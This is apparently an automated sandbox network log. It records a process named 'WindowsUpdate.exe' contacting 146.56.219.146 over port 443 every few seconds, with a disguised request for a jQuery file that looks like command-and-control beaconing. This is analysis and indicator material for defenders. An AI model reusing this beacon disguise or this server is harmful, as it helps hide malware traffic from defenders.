Dec 18, 2024 22:52:12.898595095 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:12.898925066 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:12.898952961 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:14.770992041 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:14.771106005 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:14.771850109 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:14.771863937 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:14.773528099 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:14.773534060 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:15.524214983 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:15.524470091 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:15.525094986 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:15.525165081 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:15.525182009 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:15.525227070 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:15.525258064 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:15.525305033 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:15.537312031 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:15.537333012 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:20.117263079 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:20.117305040 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:20.117381096 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:20.117640018 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:20.117664099 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:21.964292049 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:21.964453936 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:21.965313911 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:21.965321064 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:21.966581106 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:21.966587067 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:22.695593119 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:22.695662975 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:22.696150064 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:22.696213961 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:22.696224928 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:22.696265936 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:22.696305990 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:22.696362972 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:22.710985899 CET | 49736 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:22.711004972 CET | 443 | 49736 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:27.445502996 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:27.445596933 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:27.445703983 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:27.445993900 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:27.446027040 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:29.287219048 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:29.287462950 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:29.287930965 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:29.287959099 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:29.293752909 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:29.293766975 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:30.022434950 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:30.022511005 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:30.023158073 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:30.023231983 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:30.023242950 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:30.023283005 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:30.023302078 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:30.023353100 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:30.042368889 CET | 49741 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:30.042390108 CET | 443 | 49741 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:34.867197037 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:34.867238045 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:34.867345095 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:34.867685080 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:34.867701054 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:36.775968075 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:36.776165962 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:36.776860952 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:36.776873112 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:36.780607939 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:36.780615091 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:37.531950951 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:37.532023907 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:37.532305002 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:37.532370090 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:37.532386065 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:37.532413006 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:37.532428980 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:37.532442093 CET | 443 | 49742 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:37.532457113 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:37.532475948 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:37.532490969 CET | 49742 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:42.508128881 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:42.508220911 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:42.508336067 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:42.508658886 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:42.508692026 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:44.382865906 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:44.382950068 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:44.398631096 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:44.398658991 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:44.411221981 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:44.411235094 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:45.141917944 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:45.142039061 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:45.142611027 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:45.142678022 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:45.142702103 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:45.142750978 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:45.160672903 CET | 49743 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:45.160712004 CET | 443 | 49743 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:49.997499943 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:49.997591972 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:49.997699022 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:50.080321074 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:50.080363035 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:51.956331968 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:51.956451893 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:51.956911087 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:51.956939936 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:51.958188057 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:51.958201885 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:52.708034992 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:52.708141088 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:52.708400965 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:52.708481073 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:52.708523989 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:52.708579063 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:52.708581924 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:52.708631039 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:52.783193111 CET | 49744 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:52.783231020 CET | 443 | 49744 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:57.664016008 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:57.664093018 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:57.664195061 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:57.664468050 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:57.664499998 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:59.510831118 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:59.510929108 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:59.511466980 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:59.511488914 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:59.512758017 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:59.512769938 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:00.247515917 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:00.247629881 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:00.247968912 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:00.248049021 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:00.248080015 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:00.248126030 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:00.248136044 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:00.248188019 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:00.248244047 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:00.248281002 CET | 443 | 49746 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:00.248332977 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:00.248333931 CET | 49746 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:05.086261034 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:05.086297035 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:05.086373091 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:05.086745024 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:05.086760044 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:06.936750889 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:06.936852932 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:06.937474012 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:06.937484026 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:06.938821077 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:06.938827038 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:07.672385931 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:07.672451973 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:07.673171043 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:07.673233986 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:07.673245907 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:07.673263073 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:07.673312902 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:07.673451900 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:07.673466921 CET | 443 | 49763 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:07.673480034 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:07.673511028 CET | 49763 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:12.476519108 CET | 49779 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:12.476557970 CET | 443 | 49779 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:12.476628065 CET | 49779 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:12.477087975 CET | 49779 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:12.477099895 CET | 443 | 49779 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:14.336107016 CET | 443 | 49779 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:14.336189985 CET | 49779 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:14.336678982 CET | 49779 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:53:14.336688042 CET | 443 | 49779 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:53:14.337959051 CET49779443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:14.337963104 CET44349779146.56.219.146192.168.2.4
Dec 18, 2024 22:53:15.081264019 CET44349779146.56.219.146192.168.2.4
Dec 18, 2024 22:53:15.081660032 CET44349779146.56.219.146192.168.2.4
Dec 18, 2024 22:53:15.081803083 CET44349779146.56.219.146192.168.2.4
Dec 18, 2024 22:53:15.081887960 CET49779443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:15.081917048 CET49779443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:15.081990957 CET49779443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:15.082007885 CET44349779146.56.219.146192.168.2.4
Dec 18, 2024 22:53:19.836158037 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:19.836227894 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:19.836365938 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:19.836649895 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:19.836685896 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:21.968029976 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:21.968111992 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:21.968753099 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:21.968784094 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:21.971152067 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:21.971164942 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:22.779733896 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:22.779838085 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:22.780252934 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:22.780327082 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:22.780343056 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:22.780401945 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:22.780453920 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:22.780498981 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:22.780519962 CET44349799146.56.219.146192.168.2.4
Dec 18, 2024 22:53:22.780530930 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:22.781013012 CET49799443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:27.570372105 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:27.570462942 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:27.570554972 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:27.570858955 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:27.570894957 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:29.435770988 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:29.435887098 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:29.436444044 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:29.436470032 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:29.437769890 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:29.437782049 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.194819927 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195097923 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195282936 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195372105 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195389986 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195441008 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195478916 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195501089 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195530891 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195530891 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195590973 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.804744005 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.804775953 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:34.804862976 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.805120945 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.805136919 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:36.668251991 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:36.668368101 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:36.668749094 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:36.668756008 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:36.669976950 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:36.669982910 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.398691893 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.398763895 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.399461031 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.399534941 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.399558067 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.399604082 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.399610996 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.399662018 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.406042099 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.406053066 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:42.133281946 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:42.133354902 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:42.133459091 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:42.133737087 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:42.133758068 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:43.978401899 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:43.978487015 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:43.978959084 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:43.978987932 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:43.980150938 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:43.980165958 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.713480949 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.713748932 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.714238882 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.714313984 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.714346886 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.714384079 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.714442015 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.734730959 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.734761953 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:49.305309057 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:49.305373907 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:49.305484056 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:49.305809021 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:49.305824995 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.218111038 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.218394041 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.219022989 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.219033957 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.220444918 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.220454931 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.993292093 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.993386984 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.994168997 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.994247913 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.994256973 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.994306087 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.994313955 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.994368076 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:52.006045103 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:52.006057978 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:56.664669991 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:56.664721012 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:56.664825916 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:56.665266991 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:56.665282011 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:58.505497932 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:58.505604029 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:58.507895947 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:58.507901907 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:58.509628057 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:58.509634018 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.238643885 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.238797903 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:59.239408970 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.239490986 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.239628077 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:59.247819901 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:59.247844934 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:54:03.773993015 CET49905443192.168.2.4146.56.219.146
Dec 18, 2024 22:54:03.774029016 CET44349905146.56.219.146192.168.2.4
Dec 18, 2024 22:54:03.774113894 CET49905443192.168.2.4146.56.219.146
Dec 18, 2024 22:54:03.774346113 CET49905443192.168.2.4146.56.219.146
Dec 18, 2024 22:54:03.774354935 CET44349905146.56.219.146192.168.2.4
Dec 18, 2024 22:54:05.618865013 CET44349905146.56.219.146192.168.2.4
Dec 18, 2024 22:54:05.618971109 CET49905443192.168.2.4146.56.219.146
  • 146.56.219.146
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 146.56.219.146 | 443 | 6652 | C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:03 UTC | 242 | OUT | GET /res/js/jquery-3.6.2.slim.min.js HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:04 UTC | 170 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:03 GMT
Content-Type: application/octet-stream
